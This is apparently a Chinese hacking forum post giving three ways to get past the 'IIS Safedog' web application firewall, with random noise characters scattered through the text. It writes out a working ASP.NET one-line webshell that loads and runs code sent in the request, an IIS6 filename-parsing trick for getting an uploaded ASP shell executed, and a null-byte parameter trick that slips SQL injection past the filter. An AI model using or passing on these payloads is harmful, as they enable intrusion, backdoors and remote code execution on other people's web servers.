1、绕过IIS安全狗的一句话。
7 o2 K0 I) k, y+ @9 Y前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。# K0 o* J, @' b1 w( z6 }5 m
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
2 j! m+ a# }; Y& D0 I* t7 r @; C' O8 p
3 B+ e. k# ~/ }2、IIS6.0解析漏洞遇到安全狗。0 Y7 p+ V" d6 T7 n8 @1 e6 e# p
文件名为
! p) [$ L' a# w" T0 V1 A$ s% ehttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
+ F* Y5 D, J+ S) m& v9 n
! G$ g! V7 l' s) p" o" t; K$ d这样的会被IIS安全狗果断屏蔽。: c0 l% n: R8 f" L2 e. o
改成如下名称,IIS6一样会解析:
& a3 C& n; Q) ^www.xxxxx.com/;1.asp;1.jpg
) v4 v, V0 }2 V6 z
9 L1 d1 O) Y; A9 s* G6 r3、安全狗的注入绕过。* l0 v( g1 E+ _. ` l U& `/ J
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。/ |8 m* e+ I: m! A6 n7 w, W
但如果:
0 P5 I/ `7 {) `' V, D* m4 s7 Vr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
- e7 S0 u0 U2 B$ e9 \' L! ]就可以成功绕过了。: t7 n' o' M* M
2 J' a7 p- n% ?3 Y* L+ B$ z2 C
# O( r) V- {4 s3 I* K4 I# k" Y |